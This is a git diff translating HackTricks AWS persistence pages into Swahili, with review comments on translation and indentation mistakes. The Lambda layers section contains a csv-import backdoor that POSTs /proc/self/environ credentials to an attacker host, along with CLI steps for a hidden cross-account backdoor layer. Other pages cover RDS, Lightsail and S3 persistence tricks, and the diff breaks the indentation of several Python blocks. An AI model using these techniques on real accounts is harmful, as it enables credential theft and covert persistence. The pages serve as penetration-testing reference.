-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda extensions huongeza kazi kwa kuunganishwa na zana mbalimbali za **monitoring, observability, security, na governance**. Extensions hizi, zinazoongezwa kupitia [.zip archives kwa kutumia Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) au kujumuishwa katika [mifano ya picha za kontena](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), zinafanya kazi katika njia mbili: **internal** na **external**.
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **Internal extensions** huunganishwa na mchakato wa runtime, zikibadilisha uzinduzi wake kwa kutumia **language-specific environment variables** na **wrapper scripts**. Uboreshaji huu unatumika kwa aina mbalimbali za runtimes, ikiwa ni pamoja na **Java Correto 8 na 11, Node.js 10 na 12, na .NET Core 3.1**.
+- **External extensions** zinafanya kazi kama michakato tofauti, zikihakikisha uendeshaji unalingana na mzunguko wa maisha wa kazi ya Lambda. Zinapatikana kwa runtimes mbalimbali kama **Node.js 10 na 12, Python 3.7 na 3.8, Ruby 2.5 na 2.7, Java Corretto 8 na 11, .NET Core 3.1**, na **custom runtimes**.
-For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+Kwa maelezo zaidi kuhusu [**jinsi lambda extensions zinavyofanya kazi angalia docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
### External Extension for Persistence, Stealing Requests & modifying Requests
-This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+Hii ni muhtasari wa mbinu iliyopendekezwa katika chapisho hili: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
-It was found that the default Linux kernel in the Lambda runtime environment is compiled with ā**process_vm_readv**ā and ā**process_vm_writev**ā system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapidās heap memory, by design.**
+Ilipatikana kuwa kernel ya Linux ya default katika mazingira ya runtime ya Lambda imeandikwa kwa ā**process_vm_readv**ā na ā**process_vm_writev**ā system calls. Na michakato yote inafanya kazi na kitambulisho sawa cha mtumiaji, hata mchakato mpya ulioanzishwa kwa ajili ya external extension. **Hii inamaanisha kuwa external extension ina ufikiaji kamili wa kusoma na kuandika kwenye kumbukumbu ya Rapid, kwa muundo.**
-Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+Zaidi ya hayo, ingawa Lambda extensions zina uwezo wa **kujiandikisha kwa matukio ya mwito**, AWS haifunui data halisi kwa extensions hizi. Hii inahakikisha kuwa **extensions haziwezi kufikia taarifa nyeti** zinazotumwa kupitia ombi la HTTP.
-The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+Mchakato wa Init (Rapid) unafuatilia maombi yote ya API katika [http://127.0.0.1:9001](http://127.0.0.1:9001/) wakati Lambda extensions zinaanzishwa na kuendesha kabla ya utekelezaji wa msimbo wowote wa runtime, lakini baada ya Rapid.
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+Kigezo **`AWS_LAMBDA_RUNTIME_API`** kinaonyesha **IP** anwani na **nambari** ya **port** ya Rapid API kwa **michakato ya runtime ya watoto** na extensions za ziada.
> [!WARNING]
-> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+> Kwa kubadilisha kigezo cha mazingira **`AWS_LAMBDA_RUNTIME_API`** kuwa **`port`** tunayo, inawezekana kukamata vitendo vyote ndani ya runtime ya Lambda (**man-in-the-middle**). Hii inawezekana kwa sababu extension inafanya kazi na ruhusa sawa na Rapid Init, na kernel ya mfumo inaruhusu **kubadilisha kumbukumbu ya mchakato**, ikiruhusu kubadilisha nambari ya port.
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+Kwa sababu **extensions zinafanya kazi kabla ya msimbo wowote wa runtime**, kubadilisha kigezo cha mazingira kutakuwa na athari kwenye mchakato wa runtime (mfano, Python, Java, Node, Ruby) unapoanza. Zaidi ya hayo, **extensions zilizopakiwa baada** yetu, ambazo zinategemea kigezo hiki, pia zitaelekeza kupitia extension yetu. Mpangilio huu unaweza kuwezesha malware kupita kabisa hatua za usalama au logging extensions moja kwa moja ndani ya mazingira ya runtime.
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
+Chombo [**lambda-spy**](https://github.com/clearvector/lambda-spy) kilitengenezwa ili kutekeleza **memory write** na **kuchukua taarifa nyeti** kutoka kwa maombi ya lambda, maombi mengine ya **extensions** na hata **kuyabadilisha**.
## References
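Review bot: The translated paragraph keeps the mojibake quote characters from the source line, `ā**process_vm_readv**ā`, `ā**process_vm_writev**ā` and `Rapidās`; since the line is being rewritten anyway, replace them with plain quotes (`"process_vm_readv"`, `Rapid's`) rather than carrying the encoding defect into the new file. Likewise `Java Correto 8 na 11` in the internal-extensions bullet should be `Corretto`, as the next bullet spells it.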
@@ -40,7 +40,3 @@ The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created
- [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
index f8a5e2868..f5de397fd 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -4,22 +4,20 @@
## Lambda Layers
-A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+Layer ya Lambda ni archive ya .zip ambayo **inaweza kuwa na msimbo wa ziada** au maudhui mengine. Layer inaweza kuwa na maktaba, [runtime ya kawaida](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, au faili za usanidi.
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+Inawezekana kujumuisha hadi **layers tano kwa kazi**. Unapojumuisha layer katika kazi, **maudhui yanachukuliwa hadi kwenye saraka ya `/opt`** katika mazingira ya utekelezaji.
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+Kwa **default**, **layers** ambazo unaunda ni **binafsi** kwa akaunti yako ya AWS. Unaweza kuchagua **kushiriki** layer na akaunti nyingine au **kufanya** layer hiyo **kuwa ya umma**. Ikiwa kazi zako zinatumia layer ambayo akaunti tofauti ilichapisha, kazi zako zinaweza **kuendelea kutumia toleo la layer baada ya kufutwa, au baada ya ruhusa yako ya kufikia layer hiyo kufutwa**. Hata hivyo, huwezi kuunda kazi mpya au kuboresha kazi ukitumia toleo la layer lililofutwa.
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+Kazi zilizowekwa kama picha ya kontena hazitumii layers. Badala yake, unapakua runtime unayopendelea, maktaba, na utegemezi mwingine ndani ya picha ya kontena unapojenga picha hiyo.
### Python load path
-The load path that Python will use in lambda is the following:
-
+Njia ya kupakia ambayo Python itatumia katika lambda ni ifuatayo:
```
['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages']
```
-
Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`**
> [!CAUTION]
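Review bot: The paragraph `Check how the **second** and third **positions** are occupy by directories ...` sits between two translated paragraphs but is left in English (and keeps the grammar slip `occupy` for `occupied`); translate it with the rest of the page. In the container-image paragraph, `you package your preferred runtime` became `unapakua` (download); `unafunga` or `unapakia` carries the intended meaning. Note that the next hunk of this file applies the same whitespace stripping to the Python blocks, which produces an `IndentationError`: `return {` is no longer indented under `def lambda_handler(event, context):`, and the three lines after `with open("/proc/self/environ", "rb") as file:` lose their indentation, so those blocks need restoring as well.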
@@ -37,46 +35,41 @@ Therefore, the requisites are:
> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed.
With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda:
-
```python
import sys
def lambda_handler(event, context):
- return {
- 'statusCode': 200,
- 'body': str(sys.modules.keys())
- }
+return {
+'statusCode': 200,
+'body': str(sys.modules.keys())
+}
```
-
-And this is the **list** (check that libraries like `os` or `json` are already there)
-
+Na hii ni **orodha** (hakikisha kwamba maktaba kama `os` au `json` tayari zipo)
```
'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function'
```
-
-And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
+Na hii ni orodha ya **maktaba** ambazo **lambda inajumuisha zilizowekwa kwa chaguo-msingi**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3)
### Lambda Layer Backdooring
-In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**.
+Katika mfano huu hebu tuweke kuwa msimbo unaolengwa unatumia **`csv`**. Tunakwenda **kufanya backdoor kwenye uagizaji wa maktaba ya `csv`**.
-For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\
-Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\
-This file must:
+Ili kufanya hivyo, tutaunda **directory csv** yenye faili **`__init__.py`** ndani yake katika njia ambayo inapakuliwa na lambda: **`/opt/python/lib/python3.9/site-packages`**\
+Kisha, wakati lambda inatekelezwa na kujaribu kupakua **csv**, faili yetu ya **`__init__.py` itapakuliwa na kutekelezwa**.\
+Faili hii lazima:
-- Execute our payload
-- Load the original csv library
-
-We can do both with:
+- Itekeleze payload yetu
+- Ipakue maktaba ya csv asilia
+Tunaweza kufanya yote mawili kwa:
```python
import sys
from urllib import request
with open("/proc/self/environ", "rb") as file:
- url= "https://attacker13123344.com/" #Change this to your server
- req = request.Request(url, data=file.read(), method="POST")
- response = request.urlopen(req)
+url= "https://attacker13123344.com/" #Change this to your server
+req = request.Request(url, data=file.read(), method="POST")
+response = request.urlopen(req)
# Remove backdoor directory from path to load original library
del_path_dir = "/".join(__file__.split("/")[:-2])
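Review bot: The re-indented Python body under `with open("/proc/self/environ", "rb") as file:` no longer parses: the three lines `+url= "https://attacker13123344.com/" #Change this to your server`, `+req = request.Request(url, data=file.read(), method="POST")` and `+response = request.urlopen(req)` were moved to column 0, so Python raises `IndentationError: expected an indented block` at the first of them and nothing after it (including the part that restores the original csv module) ever runs. Restore the four-space indent on those three lines; a translation commit should not touch code. Separately, the blank line that stood between `- Ipakue maktaba ya csv asilia` and `Tunaweza kufanya yote mawili kwa:` was dropped, so in CommonMark that sentence becomes a lazy continuation of the last list item instead of its own paragraph; reinsert the blank line.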
@@ -90,29 +83,27 @@ import csv as _csv
sys.modules["csv"] = _csv
```
+Kisha, tengeneza zip na msimbo huu katika njia **`python/lib/python3.9/site-packages/__init__.py`** na uongeze kama tabaka la lambda.
-Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer.
+Unaweza kupata msimbo huu katika [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor)
-
-The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated:
+Payload iliyounganishwa it **tuma IAM creds kwa seva WAKATI WA KWANZA inapoitwa au BAADA ya kurekebisha kontena la lambda** (mabadiliko ya msimbo au lambda baridi), lakini **mbinu nyingine** kama ifuatavyo zinaweza pia kuunganishwa:
{{#ref}}
../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
{{#endref}}
-### External Layers
+### Tabaka za Nje
-Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\
-Also note that the **max number of layers a lambda can have is 5**.
+Kumbuka kwamba inawezekana kutumia **tabaka za lambda kutoka kwa akaunti za nje**. Aidha, lambda inaweza kutumia tabaka kutoka kwa akaunti ya nje hata kama haina ruhusa.\
+Pia kumbuka kwamba **idadi ya juu ya tabaka ambayo lambda inaweza kuwa nayo ni 5**.
-Therefore, in order to improve the versatility of this technique an attacker could:
-
-- Backdoor an existing layer of the user (nothing is external)
-- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**.
- - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda)
- - The victim **won't see external layers** used with **`aws lambda list-layers`**
+Hivyo, ili kuboresha ufanisi wa mbinu hii mshambuliaji anaweza:
+- Kuingiza nyuma tabaka lililopo la mtumiaji (hakuna chochote ni cha nje)
+- **Kuunda** **tabaka** katika **akaunti yake**, kumpa **mtumiaji waathirika ruhusa** kutumia tabaka, **kuweka** **tabaka** katika Lambda ya waathirika na **kuondoa ruhusa**.
+- **Lambda** bado itakuwa na uwezo wa **kutumia tabaka** na **waathirika hawata** kuwa na njia rahisi ya **kupakua msimbo wa tabaka** (kando na kupata rev shell ndani ya lambda)
+- Waathirika **hawataona tabaka za nje** zinazotumika na **`aws lambda list-layers`**
```bash
# Upload backdoor layer
aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
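Review bot: In `+Payload iliyounganishwa it **tuma IAM creds kwa seva ...` the bold marker is placed inside the verb (`it **tuma`); it should read `**itatuma`, mirroring the removed `will **send`. The two nested bullets (`The **Lambda** will still be able to **use the layer** ...` and `The victim **won't see external layers** ...`) also lost their two-space indent and now render as top-level items next to the two attacker options they used to sit under; restore the nesting so the list keeps its meaning.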
@@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen
# Remove permissions
aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1
```
-
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
index 88b0d082a..cb38c8483 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
@@ -4,34 +4,30 @@
## Lightsail
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-lightsail-enum.md
{{#endref}}
-### Download Instance SSH keys & DB passwords
+### Pakua Funguo za SSH za Instance & Nywila za DB
-They won't be changed probably so just having them is a good option for persistence
+Hawatabadilishwa labda hivyo kuwa nazo ni chaguo nzuri kwa ajili ya kudumu
### Backdoor Instances
-An attacker could get access to the instances and backdoor them:
+Mshambuliaji anaweza kupata ufikiaji wa instances na kuziingiza backdoor:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key**
-- Expose a port with port knocking with a backdoor
+- Kutumia **rootkit** wa jadi kwa mfano
+- Kuongeza **funguo mpya za SSH za umma**
+- Kufichua bandari kwa kutumia port knocking na backdoor
### DNS persistence
-If domains are configured:
+Ikiwa majina ya kikoa yamewekwa:
-- Create a subdomain pointing your IP so you will have a **subdomain takeover**
-- Create **SPF** record allowing you to send **emails** from the domain
-- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+- Unda subdomain inayolenga IP yako ili uwe na **subdomain takeover**
+- Unda rekodi ya **SPF** inayokuruhusu kutuma **barua pepe** kutoka kwa kikoa
+- Sanidi **IP ya kikoa kikuu kuwa yako mwenyewe** na fanya **MitM** kutoka IP yako hadi zile halali
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
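Review bot: `+Hawatabadilishwa labda hivyo kuwa nazo ni chaguo nzuri kwa ajili ya kudumu` uses the people-class subject prefix `hawa-` for SSH keys and DB passwords; `Hazitabadilishwa` agrees with `funguo`/`nywila`. The hunk also leaves `### Backdoor Instances` and `### DNS persistence` in English while translating `### Pakua Funguo za SSH za Instance & Nywila za DB`; translate all three headings or none. Finally, "persistence" is rendered here as `kudumu` but as `uvumilivu` (patience) in the STS file of this same patch; settle on one term for the whole series.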
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index b7a4b8f7b..2a3490e7f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -4,32 +4,24 @@
## RDS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}
-### Make instance publicly accessible: `rds:ModifyDBInstance`
-
-An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+### Fanya mfano uweze kupatikana hadharani: `rds:ModifyDBInstance`
+Mshambuliaji mwenye ruhusa hii anaweza **kubadilisha mfano wa RDS uliopo ili kuwezesha upatikanaji wa hadhara**.
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
-
### Create an admin user inside the DB
-An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
+Mshambuliaji anaweza tu **kuunda mtumiaji ndani ya DB** hivyo hata kama nenosiri la mtumiaji mkuu limebadilishwa **hampotezi ufikiaji** wa hifadhidata.
### Make snapshot public
-
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
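Review bot: `+### Fanya mfano uweze kupatikana hadharani: \`rds:ModifyDBInstance\`` and the following `mfano wa RDS uliopo` translate "instance" as `mfano` (example), so the heading reads "make the example publicly accessible"; the Lightsail file in this patch keeps `instances`, so keep the AWS term here too. The remaining headings `### Create an admin user inside the DB` and `### Make snapshot public` were left in English. While touching this file: the context line `aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all` has no value after `--db-snapshot-identifier`, so the CLI rejects it as written; an explicit placeholder such as `<snapshot-id>` would make that clear.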
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index f2c4ce048..babd43c0f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -4,7 +4,7 @@
## S3
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-s3-athena-and-glacier-enum.md
@@ -12,18 +12,14 @@ For more information check:
### KMS Client-Side Encryption
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+Wakati mchakato wa usimbaji unakamilika, mtumiaji atatumia KMS API kutengeneza funguo mpya (`aws kms generate-data-key`) na at **hifadhi funguo iliyosimbwa iliyotengenezwa ndani ya metadata** ya faili ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) ili wakati usimbuaji unapotokea, inaweza kusimbua tena kwa kutumia KMS:
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+Hivyo, mshambuliaji anaweza kupata funguo hii kutoka kwenye metadata na kusimbua kwa KMS (`aws kms decrypt`) ili kupata funguo iliyotumika kusimbua taarifa. Kwa njia hii, mshambuliaji atakuwa na funguo ya usimbaji na ikiwa funguo hiyo itatumika tena kusimbua faili nyingine, ataweza kuitumia.
### Using S3 ACLs
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+Ingawa kawaida ACLs za ndoo zimezimwa, mshambuliaji mwenye ruhusa za kutosha anaweza kuzitumia vibaya (ikiwa zimewezeshwa au ikiwa mshambuliaji anaweza kuzihamisha) ili kuendelea kupata ufikiaji wa ndoo ya S3.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
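Review bot: The paragraph at `+Hivyo, mshambuliaji anaweza kupata funguo hii ...` inverts encrypt/decrypt twice: `funguo iliyotumika kusimbua taarifa` says "the key used to decrypt the information" and `itatumika tena kusimbua faili nyingine` says "reused to decrypt other files", whereas the removed line says "used to encrypt" and "reused to encrypt"; the preceding line itself distinguishes `usimbaji` (encryption) from `usimbuaji` (decryption), so `kusimba` is the verb wanted in both places. In that preceding line `na at **hifadhi` splits the verb with the bold marker (should be `**atahifadhi`, mirroring `will **store`). In the ACL paragraph, `ikiwa mshambuliaji anaweza kuzihamisha` means "if the attacker can move them"; the original says "enable them", i.e. `kuziwezesha` (the RDS file in this patch already uses `kuwezesha` in exactly this sense).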
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
index c15f27003..cbc87c93e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -1,57 +1,51 @@
-# AWS - Secrets Manager Persistence
+# AWS - Usimamizi wa Siri
{{#include ../../../banners/hacktricks-training.md}}
-## Secrets Manager
+## Usimamizi wa Siri
-For more info check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
-### Via Resource Policies
+### Kupitia Sera za Rasilimali
-It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+Inawezekana **kutoa ufikiaji wa siri kwa akaunti za nje** kupitia sera za rasilimali. Angalia [**ukurasa wa Privesc wa Usimamizi wa Siri**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) kwa maelezo zaidi. Kumbuka kwamba ili **kufikia siri**, akaunti ya nje pia itahitaji **ufikiaji wa funguo za KMS zinazoficha siri**.
-### Via Secrets Rotate Lambda
+### Kupitia Lambda ya Kugeuza Siri
-To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
-
-This is how lambda code for such action could look like:
+Ili **kugeuza siri** kiotomatiki, **Lambda** iliyowekwa inaitwa. Ikiwa mshambuliaji angeweza **kubadilisha** **kanuni** angeweza moja kwa moja **kuhamasisha siri mpya** kwake mwenyewe.
+Hii ndiyo jinsi kanuni ya lambda kwa hatua kama hiyo inaweza kuonekana:
```python
import boto3
def rotate_secrets(event, context):
- # Create a Secrets Manager client
- client = boto3.client('secretsmanager')
+# Create a Secrets Manager client
+client = boto3.client('secretsmanager')
- # Retrieve the current secret value
- secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+# Retrieve the current secret value
+secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
- # Rotate the secret by updating its value
- new_secret_value = rotate_secret(secret_value)
- client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+# Rotate the secret by updating its value
+new_secret_value = rotate_secret(secret_value)
+client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
def rotate_secret(secret_value):
- # Perform the rotation logic here, e.g., generate a new password
+# Perform the rotation logic here, e.g., generate a new password
- # Example: Generate a new password
- new_secret_value = generate_password()
+# Example: Generate a new password
+new_secret_value = generate_password()
- return new_secret_value
+return new_secret_value
def generate_password():
- # Example: Generate a random password using the secrets module
- import secrets
- import string
- password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
- return password
+# Example: Generate a random password using the secrets module
+import secrets
+import string
+password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+return password
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
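Review bot: The Python block is broken by the flush-left re-indentation: every body line under `def rotate_secrets(event, context):`, `def rotate_secret(secret_value):` and `def generate_password():` lost its indent (e.g. `+client = boto3.client('secretsmanager')` immediately after the `def` line), so the module raises an IndentationError before any function is defined. Keep the original indentation; only prose should change in a translation commit. The title also regressed: `+# AWS - Usimamizi wa Siri` drops "Persistence" and is now identical to the H2 `+## Usimamizi wa Siri` below it, so the page no longer names its topic; keep the qualifier, as the Lambda and RDS files in this patch keep theirs. Two wording points: `kuhamasisha siri mpya` means "mobilize/raise awareness about the new secret", not "exfiltrate" (the SNS file of this patch renders exfiltrating as `kutoa`); and `kanuni` (rule) is used for "code" here while the Lambda file uses `msimbo`.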
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
index 8e97cc81c..d5e87937f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -4,7 +4,7 @@
## SNS
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-sns-enum.md
@@ -12,74 +12,66 @@ For more information check:
### Persistence
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
